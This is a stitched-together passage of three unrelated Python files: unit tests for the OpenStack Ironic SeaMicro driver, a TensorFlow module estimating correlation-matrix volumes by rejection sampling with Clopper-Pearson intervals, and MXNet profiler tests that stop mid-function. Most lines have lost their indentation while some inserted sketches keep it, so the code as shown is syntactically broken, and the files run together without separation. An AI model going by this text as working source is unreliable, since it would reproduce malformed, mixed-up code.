self.assertEqual(states.POWER_OFF, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__get_power_status_error(self, mock_get_server):
mock_get_server.return_value = self.Server(active=None)
pstate = seamicro._get_power_status(self.node)
self.assertEqual(states.ERROR, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__power_on_good(self, mock_get_server):
mock_get_server.return_value = self.Server(active=False)
pstate = seamicro._power_on(self.node)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__power_on_fail(self, mock_get_server):
def fake_power_on():
return
server = self.Server(active=False)
server.power_on = fake_power_on
mock_get_server.return_value = server
pstate = seamicro._power_on(self.node)
self.assertEqual(states.ERROR, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__power_off_good(self, mock_get_server):
mock_get_server.return_value = self.Server(active=True)
pstate = seamicro._power_off(self.node)
self.assertEqual(states.POWER_OFF, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__power_off_fail(self, mock_get_server):
def fake_power_off():
return
server = self.Server(active=True)
server.power_off = fake_power_off
mock_get_server.return_value = server
pstate = seamicro._power_off(self.node)
self.assertEqual(states.ERROR, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__reboot_good(self, mock_get_server):
mock_get_server.return_value = self.Server(active=True)
pstate = seamicro._reboot(self.node)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__reboot_fail(self, mock_get_server):
def fake_reboot():
return
server = self.Server(active=False)
server.reset = fake_reboot
mock_get_server.return_value = server
pstate = seamicro._reboot(self.node)
self.assertEqual(states.ERROR, pstate)
@mock.patch.object(seamicro, "_get_volume")
def test__validate_fail(self, mock_get_volume):
info = seamicro._parse_driver_info(self.node)
volume_id = "0/p6-6/vol1"
volume = self.Volume()
volume.id = volume_id
mock_get_volume.return_value = volume
self.assertRaises(exception.InvalidParameterValue,
seamicro._validate_volume, info, volume_id)
@mock.patch.object(seamicro, "_get_volume")
def test__validate_good(self, mock_get_volume):
info = seamicro._parse_driver_info(self.node)
volume = self.Volume()
mock_get_volume.return_value = volume
valid = seamicro._validate_volume(info, volume.id)
self.assertEqual(valid, True)
@mock.patch.object(seamicro, "_get_pools")
def test__create_volume_fail(self, mock_get_pools):
info = seamicro._parse_driver_info(self.node)
mock_get_pools.return_value = None
self.assertRaises(exception.IronicException,
seamicro._create_volume,
info, 2)
@mock.patch.object(seamicro, "_get_pools")
@mock.patch.object(seamicro, "_get_client")
def test__create_volume_good(self, mock_get_client, mock_get_pools):
info = seamicro._parse_driver_info(self.node)
pools = [self.Pool(1), self.Pool(6), self.Pool(5)]
get_pools_patcher = mock.patch.object(mock_get_client, "volume.create")
get_pools_patcher.start()
mock_get_pools.return_value = pools
seamicro._create_volume(info, 2)
get_pools_patcher.stop()
class SeaMicroPowerDriverTestCase(db_base.DbTestCase):
def setUp(self):
super(SeaMicroPowerDriverTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_seamicro')
self.driver = driver_factory.get_driver('fake_seamicro')
self.node = obj_utils.create_test_node(self.context,
driver='fake_seamicro',
driver_info=INFO_DICT)
self.get_server_patcher = mock.patch.object(seamicro, '_get_server')
self.get_server_mock = None
self.Server = Fake_Server
self.Volume = Fake_Volume
def test_get_properties(self):
expected = seamicro.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
self.assertEqual(expected, task.driver.get_properties())
@mock.patch.object(seamicro, '_parse_driver_info')
def test_power_interface_validate_good(self, parse_drv_info_mock):
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
task.driver.power.validate(task)
self.assertEqual(1, parse_drv_info_mock.call_count)
@mock.patch.object(seamicro, '_parse_driver_info')
def test_power_interface_validate_fails(self, parse_drv_info_mock):
side_effect = exception.InvalidParameterValue("Bad input")
parse_drv_info_mock.side_effect = side_effect
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.power.validate, task)
self.assertEqual(1, parse_drv_info_mock.call_count)
@mock.patch.object(seamicro, '_reboot')
def test_reboot(self, mock_reboot):
info = seamicro._parse_driver_info(self.node)
mock_reboot.return_value = states.POWER_ON
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
task.driver.power.reboot(task)
mock_reboot.assert_called_once_with(task.node)
def test_set_power_state_bad_state(self):
        info = seamicro._parse_driver_info(self.node)
self.get_server_mock = self.get_server_patcher.start()
self.get_server_mock.return_value = self.Server()
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.IronicException,
task.driver.power.set_power_state,
task, "BAD_PSTATE")
self.get_server_patcher.stop()
@mock.patch.object(seamicro, '_power_on')
def test_set_power_state_on_good(self, mock_power_on):
info = seamicro._parse_driver_info(self.node)
mock_power_on.return_value = states.POWER_ON
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
task.driver.power.set_power_state(task, states.POWER_ON)
mock_power_on.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_power_on')
def test_set_power_state_on_fail(self, mock_power_on):
info = seamicro._parse_driver_info(self.node)
mock_power_on.return_value = states.POWER_OFF
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.set_power_state,
task, states.POWER_ON)
mock_power_on.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_power_off')
def test_set_power_state_off_good(self, mock_power_off):
info = seamicro._parse_driver_info(self.node)
mock_power_off.return_value = states.POWER_OFF
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
task.driver.power.set_power_state(task, states.POWER_OFF)
mock_power_off.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_power_off')
def test_set_power_state_off_fail(self, mock_power_off):
info = seamicro._parse_driver_info(self.node)
mock_power_off.return_value = states.POWER_ON
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.set_power_state,
task, states.POWER_OFF)
mock_power_off.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_parse_driver_info')
def test_vendor_passthru_validate_good(self, mock_info):
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
for method in seamicro.VENDOR_PASSTHRU_METHODS:
task.driver.vendor.validate(task, **{'method': method})
self.assertEqual(len(seamicro.VENDOR_PASSTHRU_METHODS),
mock_info.call_count)
@mock.patch.object(seamicro, '_parse_driver_info')
def test_vendor_passthru_validate_fail(self, mock_info):
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.validate,
task, **{'method': 'invalid_method'})
self.assertFalse(mock_info.called)
@mock.patch.object(seamicro, '_parse_driver_info')
def test_vendor_passthru_validate_parse_driver_info_fail(self, mock_info):
mock_info.side_effect = exception.InvalidParameterValue("bad")
with task_manager.acquire(self.context, self.node['uuid'],
shared=True) as task:
method = seamicro.VENDOR_PASSTHRU_METHODS[0]
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.validate,
task, **{'method': method})
mock_info.assert_called_once_with(task.node)
@mock.patch.object(seamicro, '_get_server')
def test_set_node_vlan_id_good(self, mock_get_server):
info = seamicro._parse_driver_info(self.node)
vlan_id = "12"
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'vlan_id': vlan_id, 'method': 'set_node_vlan_id'}
task.driver.vendor.vendor_passthru(task, **kwargs)
mock_get_server.assert_called_once_with(info)
def test_set_node_vlan_id_no_input(self):
info = seamicro._parse_driver_info(self.node)
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.vendor_passthru,
task,
**{'method': 'set_node_vlan_id'})
@mock.patch.object(seamicro, '_get_server')
def test_set_node_vlan_id_fail(self, mock_get_server):
def fake_set_untagged_vlan(self, **kwargs):
raise seamicro_client_exception.ClientException(500)
info = seamicro._parse_driver_info(self.node)
vlan_id = "12"
server = self.Server(active="true")
server.set_untagged_vlan = fake_set_untagged_vlan
mock_get_server.return_value = server
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'vlan_id': vlan_id, 'method': 'set_node_vlan_id'}
self.assertRaises(exception.IronicException,
task.driver.vendor.vendor_passthru,
task,
**kwargs)
mock_get_server.assert_called_once_with(info)
@mock.patch.object(seamicro, '_get_server')
@mock.patch.object(seamicro, '_validate_volume')
def test_attach_volume_with_volume_id_good(self, mock_validate_volume,
mock_get_server):
info = seamicro._parse_driver_info(self.node)
volume_id = '0/ironic-p6-1/vol1'
mock_validate_volume.return_value = True
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'volume_id': volume_id, 'method': 'attach_volume'}
task.driver.vendor.vendor_passthru(task, **kwargs)
mock_get_server.assert_called_once_with(info)
@mock.patch.object(seamicro, '_get_server')
@mock.patch.object(seamicro, '_get_volume')
def test_attach_volume_with_invalid_volume_id_fail(self,
mock_get_volume,
mock_get_server):
info = seamicro._parse_driver_info(self.node)
volume_id = '0/p6-1/vol1'
mock_get_volume.return_value = self.Volume(volume_id)
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'volume_id': volume_id, 'method': 'attach_volume'}
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.vendor_passthru,
task,
**kwargs)
@mock.patch.object(seamicro, '_get_server')
@mock.patch.object(seamicro, '_validate_volume')
def test_attach_volume_fail(self, mock_validate_volume,
mock_get_server):
def fake_attach_volume(self, **kwargs):
raise seamicro_client_exception.ClientException(500)
info = seamicro._parse_driver_info(self.node)
volume_id = '0/p6-1/vol1'
mock_validate_volume.return_value = True
server = self.Server(active="true")
server.attach_volume = fake_attach_volume
mock_get_server.return_value = server
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'volume_id': volume_id, 'method': 'attach_volume'}
self.assertRaises(exception.IronicException,
task.driver.vendor.vendor_passthru,
task,
**kwargs)
mock_get_server.assert_called_once_with(info)
@mock.patch.object(seamicro, '_get_server')
@mock.patch.object(seamicro, '_validate_volume')
@mock.patch.object(seamicro, '_create_volume')
def test_attach_volume_with_volume_size_good(self, mock_create_volume,
mock_validate_volume,
mock_get_server):
info = seamicro._parse_driver_info(self.node)
volume_id = '0/ironic-p6-1/vol1'
volume_size = 2
mock_create_volume.return_value = volume_id
mock_validate_volume.return_value = True
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
kwargs = {'volume_size': volume_size, 'method': "attach_volume"}
task.driver.vendor.vendor_passthru(task, **kwargs)
mock_get_server.assert_called_once_with(info)
mock_create_volume.assert_called_once_with(info, volume_size)
def test_attach_volume_with_no_input_fail(self):
info = seamicro._parse_driver_info(self.node)
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.vendor.vendor_passthru, task,
**{'method': 'attach_volume'})
@mock.patch.object(seamicro, '_get_server')
def test_set_boot_device_good(self, mock_get_server):
info = seamicro._parse_driver_info(self.node)
boot_device = "disk"
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
task.driver.management.set_boot_device(task, boot_device)
mock_get_server.assert_called_once_with(info)
@mock.patch.object(seamicro, '_get_server')
def test_set_boot_device_invalid_device_fail(self, mock_get_server):
info = seamicro._parse_driver_info(self.node)
boot_device = "invalid_device"
mock_get_server.return_value = self.Server(active="true")
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.management.set_boot_device,
task, boot_device)
@mock.patch.object(seamicro, '_get_server')
def test_set_boot_device_fail(self, mock_get_server):
def fake_set_boot_order(self, **kwargs):
raise seamicro_client_exception.ClientException(500)
info = seamicro._parse_driver_info(self.node)
boot_device = "pxe"
server = self.Server(active="true")
server.set_boot_order = fake_set_boot_order
mock_get_server.return_value = server
with task_manager.acquire(self.context, info['uuid'],
shared=False) as task:
self.assertRaises(exception.IronicException,
task.driver.management.set_boot_device,
task, boot_device)
mock_get_server.assert_called_once_with(info)
def test_management_interface_get_supported_boot_devices(self):
with task_manager.acquire(self.context, self.node.uuid) as task:
expected = [boot_devices.PXE, boot_devices.DISK]
            self.assertEqual(
                sorted(expected),
                sorted(task.driver.management.get_supported_boot_devices()))
def test_management_interface_get_boot_device(self):
with task_manager.acquire(self.context, self.node.uuid) as task:
expected = {'boot_device': None, 'persistent': None}
self.assertEqual(expected,
task.driver.management.get_boot_device(task))
def test_management_interface_validate_good(self):
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.management.validate(task)
def test_management_interface_validate_fail(self):
# Missing SEAMICRO driver_info information
node = obj_utils.create_test_node(self.context, id=2,
uuid=utils.generate_uuid(),
driver='fake_seamicro')
with task_manager.acquire(self.context, node.uuid) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.management.validate, task)
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimating the volume of the correlation matrices with bounded determinant.
Why? Because lkj_test.py tests the sampler for the LKJ distribution
by estimating the same volume another way.
How? Rejection sampling. Or, more precisely, importance sampling,
proposing from the uniform distribution on symmetric matrices with
diagonal 1s and entries in [-1, 1]. Such a matrix is a correlation
matrix if and only if it is also positive semi-definite.
The samples can then be converted into a confidence interval on the
volume in question by the [Clopper-Pearson
method](https://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval),
also implemented here.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import sys
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import uniform
from tensorflow.python.ops.distributions import util
from tensorflow.python.platform import tf_logging
__all__ = [
"correlation_matrix_volume_rejection_samples",
"compute_true_volumes",
]
def try_import(name): # pylint: disable=invalid-name
module = None
try:
module = importlib.import_module(name)
except ImportError as e:
tf_logging.warning("Could not import %s: %s" % (name, str(e)))
return module
optimize = try_import("scipy.optimize")
stats = try_import("scipy.stats")
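# For intuition, here is a minimal pure-NumPy sketch of the estimator the
# module docstring describes. It is illustrative only and not used by the
# TensorFlow code below. For dim = 3 the true volume of the correlation
# matrices is pi**2 / 2 (about 4.935), so against the proposal cube of
# volume 2**3 = 8 the acceptance rate should be roughly 0.617.
def _numpy_rejection_sketch(dim=3, num_samples=10000, seed=0):
  """Illustrative-only Monte Carlo estimate of the correlation matrix volume."""
  rng = np.random.RandomState(seed)
  num_off_diag = dim * (dim - 1) // 2
  iu = np.triu_indices(dim, k=1)
  accepted = 0
  for _ in range(num_samples):
    m = np.eye(dim)
    m[iu] = rng.uniform(-1., 1., size=num_off_diag)
    m = m + m.T - np.eye(dim)  # symmetric, with 1s on the diagonal
    if np.linalg.eigvalsh(m).min() >= 0.:  # PSD <=> correlation matrix
      accepted += 1
  proposal_volume = 2. ** num_off_diag
  return proposal_volume * accepted / num_samples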
def _psd_mask(x):
"""Computes whether each square matrix in the input is positive semi-definite.
Args:
x: A floating-point `Tensor` of shape `[B1, ..., Bn, M, M]`.
Returns:
    mask: A floating-point `Tensor` of shape `[B1, ..., Bn]`. Each
scalar is 1 if the corresponding matrix was PSD, otherwise 0.
"""
# Allegedly
# https://scicomp.stackexchange.com/questions/12979/testing-if-a-matrix-is-positive-semi-definite
# it is more efficient to test for positive semi-definiteness by
# trying to compute the Cholesky decomposition -- the matrix is PSD
# if you succeed and not PSD if you fail. However, TensorFlow's
# Cholesky raises an exception if _any_ of the input matrices are
# not PSD, from which I don't know how to extract _which ones_, so I
# proceed by explicitly computing all the eigenvalues and checking
# whether they are all positive or not.
#
# Also, as was discussed in the answer, it is somewhat dangerous to
# treat SPD-ness as binary in floating-point arithmetic. Cholesky
# factorization can complete and 'look' like everything is fine
# (e.g., O(1) entries and a diagonal of all ones) but the matrix can
# have an exponential condition number.
eigenvalues, _ = linalg_ops.self_adjoint_eig(x)
return math_ops.cast(
math_ops.reduce_min(eigenvalues, axis=-1) >= 0, dtype=x.dtype)
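# For contrast with the comment above: in NumPy the Cholesky-based check is
# easy to express per matrix, because the failure is an exception on that
# one matrix rather than on the whole batch. A hypothetical sketch (not
# used below); note that Cholesky strictly requires positive *definite*
# input, so boundary PSD matrices are rejected -- a measure-zero event
# under the uniform proposal used in this file.
def _psd_mask_numpy_cholesky(x):
  """Illustrative-only per-matrix Cholesky PSD check on a NumPy array."""
  flat = np.reshape(x, (-1,) + x.shape[-2:])
  mask = np.empty(flat.shape[0], dtype=x.dtype)
  for i, m in enumerate(flat):
    try:
      np.linalg.cholesky(m)
      mask[i] = 1.
    except np.linalg.LinAlgError:
      mask[i] = 0.
  return np.reshape(mask, x.shape[:-2])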
def _det_large_enough_mask(x, det_bounds):
"""Returns whether the input matches the given determinant limit.
Args:
x: A floating-point `Tensor` of shape `[B1, ..., Bn, M, M]`.
det_bounds: A floating-point `Tensor` that must broadcast to shape
`[B1, ..., Bn]`, giving the desired lower bound on the
determinants in `x`.
Returns:
    mask: A floating-point `Tensor` of shape `[B1, ..., Bn]`. Each
scalar is 1 if the corresponding matrix had determinant above
the corresponding bound, otherwise 0.
"""
# For the curious: I wonder whether it is possible and desirable to
# use a Cholesky decomposition-based algorithm for this, since the
# only matrices whose determinant this code cares about will be PSD.
# Didn't figure out how to code that in TensorFlow.
#
# Expert opinion is that it would be about twice as fast since
# Cholesky is roughly half the cost of Gaussian Elimination with
# Partial Pivoting. But this is less of an impact than the switch in
# _psd_mask.
return math_ops.cast(
linalg_ops.matrix_determinant(x) > det_bounds, dtype=x.dtype)
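# For the curious reader: the Cholesky-based determinant alluded to above
# follows from det(M) = det(L) * det(L^T) = prod(diag(L))**2 for a Cholesky
# factor L of a PSD matrix M. A hypothetical NumPy sketch, illustrative only:
def _det_via_cholesky_numpy(m):
  """Illustrative only: determinant of a PSD matrix from its Cholesky factor."""
  chol = np.linalg.cholesky(m)
  return np.prod(np.diagonal(chol)) ** 2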
def _uniform_correlation_like_matrix(num_rows, batch_shape, dtype, seed):
"""Returns a uniformly random `Tensor` of "correlation-like" matrices.
A "correlation-like" matrix is a symmetric square matrix with all entries
between -1 and 1 (inclusive) and 1s on the main diagonal. Of these,
the ones that are positive semi-definite are exactly the correlation
matrices.
Args:
num_rows: Python `int` dimension of the correlation-like matrices.
batch_shape: `Tensor` or Python `tuple` of `int` shape of the
batch to return.
dtype: `dtype` of the `Tensor` to return.
seed: Random seed.
Returns:
matrices: A `Tensor` of shape `batch_shape + [num_rows, num_rows]`
and dtype `dtype`. Each entry is in [-1, 1], and each matrix
along the bottom two dimensions is symmetric and has 1s on the
main diagonal.
"""
  num_entries = num_rows * (num_rows + 1) // 2
ones = array_ops.ones(shape=[num_entries], dtype=dtype)
# It seems wasteful to generate random values for the diagonal since
# I am going to throw them away, but `fill_triangular` fills the
# diagonal, so I probably need them.
# It's not impossible that it would be more efficient to just fill
# the whole matrix with random values instead of messing with
# `fill_triangular`. Then would need to filter almost half out with
# `matrix_band_part`.
unifs = uniform.Uniform(-ones, ones).sample(batch_shape, seed=seed)
tril = util.fill_triangular(unifs)
symmetric = tril + array_ops.matrix_transpose(tril)
diagonal_ones = array_ops.ones(
shape=util.pad(batch_shape, axis=0, back=True, value=num_rows),
dtype=dtype)
return array_ops.matrix_set_diag(symmetric, diagonal_ones)
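# A hypothetical sketch of the alternative mused about in the comment above:
# sample a full square of uniforms, keep the lower triangle with
# `matrix_band_part`, then symmetrize. Assumes `batch_shape` is a Python
# tuple; illustrative only, not used below.
def _uniform_correlation_like_matrix_alt(num_rows, batch_shape, dtype, seed):
  """Illustrative-only variant that samples (and discards) extra entries."""
  shape = list(batch_shape) + [num_rows, num_rows]
  ones = array_ops.ones(shape=shape, dtype=dtype)
  unifs = uniform.Uniform(-ones, ones).sample(seed=seed)
  tril = array_ops.matrix_band_part(unifs, -1, 0)  # keep the lower triangle
  symmetric = tril + array_ops.matrix_transpose(tril)
  diagonal_ones = array_ops.ones(shape[:-1], dtype=dtype)
  return array_ops.matrix_set_diag(symmetric, diagonal_ones)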
def correlation_matrix_volume_rejection_samples(
det_bounds, dim, sample_shape, dtype, seed):
"""Returns rejection samples from trying to get good correlation matrices.
The proposal being rejected from is the uniform distribution on
"correlation-like" matrices. We say a matrix is "correlation-like"
if it is a symmetric square matrix with all entries between -1 and 1
(inclusive) and 1s on the main diagonal. Of these, the ones that
are positive semi-definite are exactly the correlation matrices.
The rejection algorithm, then, is to sample a `Tensor` of
`sample_shape` correlation-like matrices of dimensions `dim` by
`dim`, and check each one for (i) being a correlation matrix (i.e.,
PSD), and (ii) having determinant at least the corresponding entry
of `det_bounds`.
Args:
det_bounds: A `Tensor` of lower bounds on the determinants of
acceptable matrices. The shape must broadcast with `sample_shape`.
dim: A Python `int` dimension of correlation matrices to sample.
sample_shape: Python `tuple` of `int` shape of the samples to
compute, excluding the two matrix dimensions.
dtype: The `dtype` in which to do the computation.
seed: Random seed.
Returns:
weights: A `Tensor` of shape `sample_shape`. Each entry is 0 if the
corresponding matrix was not a correlation matrix, or had too
      small a determinant. Otherwise, the entry is the
multiplicative inverse of the density of proposing that matrix
uniformly, i.e., the volume of the set of `dim` by `dim`
correlation-like matrices.
volume: The volume of the set of `dim` by `dim` correlation-like
matrices.
"""
with ops.name_scope("rejection_sampler"):
rej_proposals = _uniform_correlation_like_matrix(
dim, sample_shape, dtype, seed=seed)
rej_proposal_volume = 2. ** (dim * (dim - 1) / 2.)
# The density of proposing any given point is 1 / rej_proposal_volume;
# The weight of that point should be scaled by
# 1 / density = rej_proposal_volume.
rej_weights = rej_proposal_volume * _psd_mask(
rej_proposals) * _det_large_enough_mask(rej_proposals, det_bounds)
return rej_weights, rej_proposal_volume
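# A hypothetical usage sketch: the Monte Carlo estimate of the volume of
# acceptable matrices is just the sample mean of the returned weights.
# Illustrative only; `compute_true_volumes` below does this with a
# Clopper-Pearson interval instead of a point estimate.
def _volume_point_estimate_sketch(det_bounds, dim, num_samples, dtype, seed):
  """Illustrative only: point estimate of the acceptable-matrix volume."""
  rej_weights, _ = correlation_matrix_volume_rejection_samples(
      det_bounds, dim, [num_samples], dtype, seed=seed)
  return math_ops.reduce_mean(rej_weights, axis=0)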
def _clopper_pearson_confidence_interval(samples, error_rate):
"""Computes a confidence interval for the mean of the given 1-D distribution.
Assumes (and checks) that the given distribution is Bernoulli, i.e.,
takes only two values. This licenses using the CDF of the binomial
distribution for the confidence, which is tighter (for extreme
probabilities) than the DKWM inequality. The method is known as the
[Clopper-Pearson method]
(https://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval).
Assumes:
- The given samples were drawn iid from the distribution of interest.
- The given distribution is a Bernoulli, i.e., supported only on
low and high.
Guarantees:
- The probability (over the randomness of drawing the given sample)
that the true mean is outside the returned interval is no more
than the given error_rate.
Args:
samples: `np.ndarray` of samples drawn iid from the distribution
of interest.
error_rate: Python `float` admissible rate of mistakes.
Returns:
low: Lower bound of confidence interval.
high: Upper bound of confidence interval.
Raises:
ValueError: If `samples` has rank other than 1 (batch semantics
are not implemented), or if `samples` contains values other than
`low` or `high` (as that makes the distribution not Bernoulli).
"""
# TODO(b/78025336) Migrate this confidence interval function
# to statistical_testing.py. In order to do that
# - Get the binomial CDF from the Binomial distribution
# - Implement scalar root finding in TF. Batch bisection search
# shouldn't be too hard, and is definitely good enough for this
# problem. Batching the Brent algorithm (from scipy) that is used
# here may be more involved, but may also not be necessary---it's
# only used here because scipy made it convenient. In particular,
# robustness is more important than speed here, which may make
# bisection search actively better.
# - The rest is just a matter of rewriting in the appropriate style.
if optimize is None or stats is None:
raise ValueError(
"Scipy is required for computing Clopper-Pearson confidence intervals")
if len(samples.shape) != 1:
raise ValueError("Batch semantics not implemented")
n = len(samples)
low = np.amin(samples)
high = np.amax(samples)
successes = np.count_nonzero(samples - low)
failures = np.count_nonzero(samples - high)
if successes + failures != n:
uniques = np.unique(samples)
msg = ("Purportedly Bernoulli distribution had distinct samples"
" {}, {}, and {}".format(uniques[0], uniques[1], uniques[2]))
raise ValueError(msg)
def p_small_enough(p):
prob = stats.binom.logcdf(successes, n, p)
return prob - np.log(error_rate / 2.)
def p_big_enough(p):
prob = stats.binom.logsf(successes, n, p)
return prob - np.log(error_rate / 2.)
high_p = optimize.brentq(
p_small_enough, float(successes) / n, 1., rtol=1e-9)
low_p = optimize.brentq(
p_big_enough, 0., float(successes) / n, rtol=1e-9)
low_interval = low + (high - low) * low_p
high_interval = low + (high - low) * high_p
return (low_interval, high_interval)
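# A hypothetical self-check (assuming scipy is importable): with 617
# successes in 1000 Bernoulli samples, the interval at error_rate=1e-6
# should bracket the empirical mean 0.617. Illustrative only.
def _clopper_pearson_demo():
  """Illustrative only: the interval brackets the empirical mean."""
  samples = np.concatenate([np.ones(617), np.zeros(383)])
  low, high = _clopper_pearson_confidence_interval(samples, error_rate=1e-6)
  assert low < 0.617 < high
  return low, high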
def compute_true_volumes(
det_bounds, dim, num_samples, error_rate=1e-6, seed=42):
"""Returns confidence intervals for the desired correlation matrix volumes.
The confidence intervals are computed by the [Clopper-Pearson method]
(https://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval).
Args:
det_bounds: A rank-1 numpy array of lower bounds on the
determinants of acceptable matrices. Entries must be unique.
dim: A Python `int` dimension of correlation matrices to sample.
num_samples: The number of samples to draw.
error_rate: The statistical significance of the returned
confidence intervals. The significance is broadcast: Each
returned interval separately may be incorrect with probability
(under the sample of correlation-like matrices drawn internally)
at most `error_rate`.
seed: Random seed.
Returns:
bounds: A Python `dict` mapping each determinant bound to the low, high
tuple giving the confidence interval.
"""
bounds = {}
with session.Session() as sess:
rej_weights, _ = correlation_matrix_volume_rejection_samples(
det_bounds, dim, [num_samples, len(det_bounds)], np.float32, seed=seed)
rej_weights = sess.run(rej_weights)
for rw, det in zip(np.rollaxis(rej_weights, 1), det_bounds):
template = ("Estimating volume of {}x{} correlation "
"matrices with determinant >= {}.")
print(template.format(dim, dim, det))
sys.stdout.flush()
bounds[det] = _clopper_pearson_confidence_interval(
rw, error_rate=error_rate)
return bounds
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import logging
import mxnet as mx
from mxnet import profiler
import time
import os
from nose.tools import with_setup
from nose import SkipTest
def enable_profiler(profile_filename, run=True, continuous_dump=False, aggregate_stats=False):
profiler.set_config(profile_symbolic=True,
profile_imperative=True,
profile_memory=True,
profile_api=True,
filename=profile_filename,
continuous_dump=continuous_dump,
aggregate_stats=aggregate_stats
)
    print('profile file saved to {}'.format(profile_filename))
if run is True:
profiler.set_state('run')
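# A minimal usage sketch of the pattern the tests below exercise
# (hypothetical helper, illustrative only): profile one callable, then
# dump the collected records before stopping the profiler.
def _profile_block_sketch(profile_filename, fn):
    """Illustrative only: run `fn` under the profiler, then dump and stop."""
    enable_profiler(profile_filename, run=True)
    try:
        fn()
    finally:
        profiler.dump()
        profiler.set_state('stop')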
# Perform a check to see if the platform was compiled with USE_PROFILER=1
def check_if_supported():
# If profiler support is absent, domain handle will be None
try:
domain = profiler.Domain(name='PythonDomain')
if domain.handle.value is None:
raise SkipTest('compile with USE_PROFILER=1 to enable this test.')
    except Exception:
raise SkipTest('compile with USE_PROFILER=1 to enable this test.')
@with_setup(check_if_supported)
def test_profiler():
iter_num = 5
begin_profiling_iter = 2
end_profiling_iter = 4
enable_profiler('test_profiler.json', False, False)
A = mx.sym.Variable('A')
B = mx.sym.Variable('B')
C = mx.symbol.dot(A, B)
executor = C.simple_bind(mx.cpu(1), 'write', A=(4096, 4096), B=(4096, 4096))
a = mx.random.uniform(-1.0, 1.0, shape=(4096, 4096))
b = mx.random.uniform(-1.0, 1.0, shape=(4096, 4096))
a.copyto(executor.arg_dict['A'])
b.copyto(executor.arg_dict['B'])
print("execution begin")
for i in range(iter_num):
print("Iteration {}/{}".format(i + 1, iter_num))
if i == begin_profiling_iter:
            t0 = time.time()
profiler.set_state('run')
if i == end_profiling_iter:
            t1 = time.time()
profiler.set_state('stop')
executor.forward()
c = executor.outputs[0]
c.wait_to_read()
print("execution end")
duration = t1 - t0
print('duration: {0}s'.format(duration))
print(' {0}ms/operator'.format(duration*1000/iter_num))
profiler.dump(True)
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_create_domain():
enable_profiler('test_profile_create_domain.json')
domain = profiler.Domain(name='PythonDomain')
print("Domain created: {}".format(str(domain)))
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_create_domain_dept():
profiler.set_config(profile_symbolic=True, filename='test_profile_create_domain_dept.json')
profiler.set_state('run')
domain = profiler.Domain(name='PythonDomain')
